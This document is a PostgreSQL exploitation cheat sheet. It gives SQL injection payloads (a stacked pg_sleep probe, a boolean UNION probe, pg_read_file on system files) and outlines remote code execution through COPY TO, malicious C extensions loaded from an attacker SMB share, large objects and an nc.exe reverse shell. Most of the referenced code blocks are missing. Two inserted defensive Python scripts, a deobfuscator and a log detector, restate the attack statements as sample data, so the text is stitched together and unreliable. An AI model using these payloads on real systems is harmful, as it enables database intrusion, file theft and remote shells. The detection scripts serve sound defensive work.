PostgreSQL Exploitation [NEW]

Stacked queries and Blind Time Based SQL Injection

Watch out for queries that return multiple rows where the application expects just one: it can break the program.

It is important to know that PostgreSQL supports stacked queries (only the basic ones: SELECT, DELETE, INSERT etc.). That means that if we find an injection point, we are able to terminate the current query with the ; keyword and then inject our own command.

Example (sleep script injection to confirm the vulnerability):

http://site?id=5;SELECT+pg_sleep(10);

After confirming the vulnerability and the ability to perform stacked queries, we can proceed to crafting an RCE payload. This is possible by usage of.

Reading files with PostgreSQL

select pg_read_file('[path_to_file]' , 0 , 1000000);

Blind Boolean-Based SQL Injection (UNION INTEGER CAST)

We are able to extract data from the database even if the UNION casts to integer. With the payload below, swapping the P for other letters, we can determine which letter the value starts with.

If we want to automate the process, we have to go through the whole alphabet to find the match. Once the first letter is discovered, the script has to extend the search by another letter and compare two letters from the database with the valid previous letter plus the new one, which is again guessed by the loop.

Example Boolean Based SQL injection payload:

SELECT version() UNION SELECT CASE WHEN SUBSTRING(version(), 1, 1) = 'P' THEN '1' ELSE '0' END;

Problem with special characters

Sometimes you will encounter encoding applied to special HTML characters. In order to still be able to use them, we can leverage CHR() characters to build the command.

[RCE] Saving files using PostgreSQL

We can leverage the COPY TO functionality to create a reverse shell on the machine, but in this case CHR() will not work.

Bypassing the possible restrictions

That is why we have to use substitutes: there are a few options in PostgreSQL that allow us to replace special characters.

For example, when we cannot use the ' character we can replace it with $$. If we cannot use " we can replace it with $.
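The two substitutions just described (CHR() concatenation for characters that get encoded, and $$ or $tag$ dollar quoting in place of single quotes) also turn up in server query logs during incident review. The following Python script is an added example, not part of this page's original material: it rewrites such fragments back into ordinary quoted literals so an analyst can read what a logged statement actually contained, and reports which substitution was used. The sample statements are constructed; the function names are my own.

```python
import re

# Constructed samples of the two substitutions: a string literal spelled out as
# CHR() concatenations, and dollar quoting ($$ or $tag$) standing in for single
# quotes. These are not real captures.
SAMPLES = [
    "SELECT pg_read_file(CHR(47)||CHR(101)||CHR(116)||CHR(99)||CHR(47)"
    "||CHR(112)||CHR(97)||CHR(115)||CHR(115)||CHR(119)||CHR(100), 0, 1000000)",
    "COPY tmp_t TO $$/tmp/out.txt$$",
    "SELECT pg_read_file($q$/etc/passwd$q$, 0, 1000000)",
]

# A run of CHR(n) calls joined by ||, e.g. CHR(47)||CHR(101)
CHR_CHAIN = re.compile(r"\bchr\(\s*\d+\s*\)(?:\s*\|\|\s*chr\(\s*\d+\s*\))*", re.IGNORECASE)
CHR_ARG = re.compile(r"chr\(\s*(\d+)\s*\)", re.IGNORECASE)
# A dollar-quoted string: $$...$$ or $tag$...$tag$ (the tag must match at both ends;
# the empty alternative keeps group 1 defined so the backreference works for $$)
DOLLAR = re.compile(r"\$([A-Za-z_]\w*|)\$(.*?)\$\1\$", re.DOTALL)


def _quote(text):
    """Render text as a standard SQL single-quoted literal."""
    return "'" + text.replace("'", "''") + "'"


def _chr_chain_to_literal(match):
    """Decode every CHR(n) in the matched chain; PostgreSQL accepts up to U+10FFFF."""
    chars = []
    for n in CHR_ARG.findall(match.group(0)):
        code = int(n)
        chars.append(chr(code) if code <= 0x10FFFF else "\ufffd")
    return _quote("".join(chars))


def normalize(sql):
    """Rewrite dollar-quoted strings and CHR() chains as plain literals."""
    sql = DOLLAR.sub(lambda m: _quote(m.group(2)), sql)
    return CHR_CHAIN.sub(_chr_chain_to_literal, sql)


def obfuscation_used(sql):
    """Name the substitutions present in a statement (empty list if none)."""
    found = []
    if CHR_CHAIN.search(sql):
        found.append("chr_concat")
    if DOLLAR.search(sql):
        found.append("dollar_quote")
    return found


if __name__ == "__main__":
    for s in SAMPLES:
        print(obfuscation_used(s), "->", normalize(s))
```

Dollar quoting is legitimate PostgreSQL syntax (it is common in function bodies), so its presence alone is not a finding; the useful signal is a dollar-quoted or CHR()-built string appearing inside an application's ordinary parameter position, which is why the normalizer prints the decoded statement for a human to judge.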

Creating Reverse Shell

In order to create a reverse shell, or just create a file using PostgreSQL, we have to:

  1. Create a temporary table and enter the data there.

  2. Use the data from the temporary table to fill our created file.

You can also use a base64 decoder to deliver the payload without triggering errors:

Meterpreter payload files

For malicious files with a reverse shell you can use meterpreter. Sample command that creates the malicious file:

Superuser functionalities

In order to check whether we are a superuser we can run the following command:

In the case of blind SQLi we can combine it with the pg_sleep command.

If this is the case, new possibilities open up to us. For example, we can upload malicious PostgreSQL extensions to gain RCE.

[RCE] Malicious extension (.dll)

For an extension to work it has to follow the appropriate PostgreSQL structure.

With a more general approach to PostgreSQL exploitation we usually prefer a universal solution that is not environment-specific. Creating a malicious extension can help with that: we are able to develop our own add-on written in C.

Loading extension:

Extension C code (compile on the victim host):

Testing the execution from local location

Before running the extension we created, we have to create a UDF (User Defined Function).

Sample UDF:

This piece of SQL loads our extension and executes the previously defined command to open calc.exe on the target machine.

Executing the script from remote location

In order to load the extension from a remote location, the attacker has to host their own SMB server using the impacket library:

Now we can point to the remote location instead of the local one in our payload:

[RCE] PostgreSQL Large Objects

The COPY TO function is not able to transfer binary files; this is the remediation for that obstacle.

While malicious extensions are a great way to gain RCE in an internal network, they are not suitable for testing from an external address.

One of the best ways to deliver and execute a payload is combining PostgreSQL Large Objects (LO) and a malicious extension.

In order to do that we have to:

  1. Generate a DLL file containing the malicious payload.

Build the file below on the victim's system if possible and transfer the file to the attacker's machine to be sure everything will work properly.

You can use the following PowerShell command to convert the built .dll file to hex encoding.

  2. Execute a query to create a large object from an arbitrary remote file on disk.

You can select any other existing file on the system instead of win.ini.

1337 -> ID of the large object in the table (required to retrieve it later)

  3. Execute a query to write the first 2KB of the DLL to page 0 of the large object.

7730374 -> place where we put 2KB of our payload [HEX Encoded]

loid = 1337 -> ID of our Large Object created before

pageno = 0 -> first part of the file

  4. Execute queries to add additional pages in the pg_largeobject table to store the remaining contents of the DLL.

For the encoding you can use the following command: xxd -p file.dll > output.txt

(optional)

pageno = 1 -> second part of the file

The script below automates the process of inserting the file:

  5. Execute a query to export the large object (DLL) to the remote server's file system.

  6. Execute a query to create a PostgreSQL User Defined Function (UDF) that uses the exported DLL and executes a payload inside.

Instead of calc.exe we put a reverse shell payload here (e.g. downloading and executing nc.exe)
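Every primitive this page walks through (the stacked pg_sleep probe, the UNION/CASE boolean probe, pg_read_file, COPY ... TO a file path, writes to pg_largeobject, and a LANGUAGE C function pointing at an exported DLL or a UNC path) leaves a recognisable statement in the PostgreSQL server log once log_statement or log_min_duration_statement is enabled. The following Python detector is an added example and not one of this page's own scripts: it parses lines in the default "%t [%p] %u@%d" prefix form, tags each statement with the primitives it contains, treats a logged duration above a threshold together with pg_sleep as a confirmed delay, and groups hits per backend pid so a session that escalates from a probe to a file write stands out. The log lines, session ids, names and the share host are constructed; the signal names and the 5 second threshold are assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed log excerpt in the shape of log_statement = 'all' output with a
# "%t [%p] %u@%d " line prefix; the "duration: ... ms" form comes from
# log_min_duration_statement. Session ids, names and the share host are made up.
SAMPLE_LOG = """\
2024-05-01 10:00:01 UTC [4101] app@shop LOG:  statement: SELECT name FROM products WHERE id = 5
2024-05-01 10:00:07 UTC [4101] app@shop LOG:  duration: 10004.218 ms  statement: SELECT name FROM products WHERE id = 5;SELECT pg_sleep(10);
2024-05-01 10:00:09 UTC [4101] app@shop LOG:  statement: SELECT version() UNION SELECT CASE WHEN SUBSTRING(version(), 1, 1) = 'P' THEN '1' ELSE '0' END
2024-05-01 10:00:12 UTC [4101] app@shop LOG:  statement: select pg_read_file('/etc/passwd', 0, 1000000)
2024-05-01 10:00:20 UTC [4101] app@shop LOG:  statement: COPY tmp_t TO $$C:\\Windows\\Temp\\out.txt$$
2024-05-01 10:00:25 UTC [4101] app@shop LOG:  statement: INSERT INTO pg_largeobject (loid, pageno, data) VALUES (1337, 0, decode('4d5a9000', 'hex'))
2024-05-01 10:00:31 UTC [4101] app@shop LOG:  statement: CREATE OR REPLACE FUNCTION run(text) RETURNS void AS $$\\\\attacker-host\\share\\ext.dll$$, $$run$$ LANGUAGE C STRICT
2024-05-01 10:00:35 UTC [4101] app@shop LOG:  statement: SELECT pg_read_file(CHR(47)||CHR(101)||CHR(116)||CHR(99)||CHR(47)||CHR(104)||CHR(111)||CHR(115)||CHR(116)||CHR(115))
2024-05-01 10:00:40 UTC [4102] app@shop LOG:  statement: UPDATE products SET stock = stock - 1 WHERE id = 5
"""

LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) LOG:\s+"
    r"(?:duration: (?P<ms>[\d.]+) ms\s+)?statement: (?P<sql>.*)$"
)
# A terminator followed by more text: a second statement in one query string.
# (A ';' inside a string literal also matches; that is accepted noise here.)
STACKED = re.compile(r";\s*\S")
SIGNALS = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in [
    ("time_based_probe",    r"\bpg_sleep\s*\("),
    ("boolean_probe",       r"\bUNION\b.*\bCASE\s+WHEN\b.*\bSUBSTRING\s*\("),
    ("server_file_read",    r"\bpg_(?:read_file|read_binary_file|ls_dir)\s*\("),
    ("server_file_write",   r"\bCOPY\b(?!.*\bFROM\b).*\bTO\s+(?!STDOUT\b)\S"),
    ("large_object_tamper", r"\bpg_largeobject\b|\blo_(?:import|export)\s*\("),
    ("native_udf",          r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+C\b"),
    ("unc_path",            r"\\\\[\w.-]+\\"),
    ("chr_obfuscation",     r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|"),
]]
SLEEP_CONFIRM_MS = 5000.0  # assumption: no legitimate app query runs this long


@dataclass
class Finding:
    pid: str
    user: str
    duration_ms: Optional[float]
    stacked: bool
    signals: List[str]
    sql: str


def analyze(sql: str, duration_ms: Optional[float] = None):
    """Return (signal names, stacked?) for one logged statement."""
    hits = [name for name, rx in SIGNALS if rx.search(sql)]
    if duration_ms is not None and duration_ms >= SLEEP_CONFIRM_MS and "time_based_probe" in hits:
        hits.append("sleep_delay_confirmed")  # the sleep really executed server-side
    return hits, bool(STACKED.search(sql))


def scan(log_text: str) -> List[Finding]:
    """Parse a log excerpt and keep only statements that carry a signal."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # continuation lines, non-statement entries, other prefixes
        ms = float(m["ms"]) if m["ms"] else None
        hits, stacked = analyze(m["sql"], ms)
        if hits or stacked:
            findings.append(Finding(m["pid"], m["user"], ms, stacked, hits, m["sql"]))
    return findings


def sessions_to_review(findings: List[Finding]):
    """Collect the distinct signals seen per backend pid (one pid = one session)."""
    by_pid = {}
    for f in findings:
        by_pid.setdefault(f.pid, set()).update(f.signals)
        if f.stacked:
            by_pid[f.pid].add("stacked_query")
    return by_pid


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"pid={f.pid} user={f.user} stacked={f.stacked} {f.signals}: {f.sql[:70]}")
    print(sessions_to_review(hits))
```

Run against the constructed excerpt, pid 4101 accumulates a time-based probe, a boolean probe, a server file read, a COPY to a file path, a pg_largeobject write and a C-language UDF referencing a UNC path within forty seconds, while pid 4102 produces nothing. Any one of the file-write or UDF signals from an application role is worth an alert on its own; it also only fires if the role has those privileges, so pairing this with running the application as a non-superuser that is not a member of pg_read_server_files or pg_write_server_files removes most of the page's techniques at the source.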

Reverse shell using Large Object Addon [Python Script]
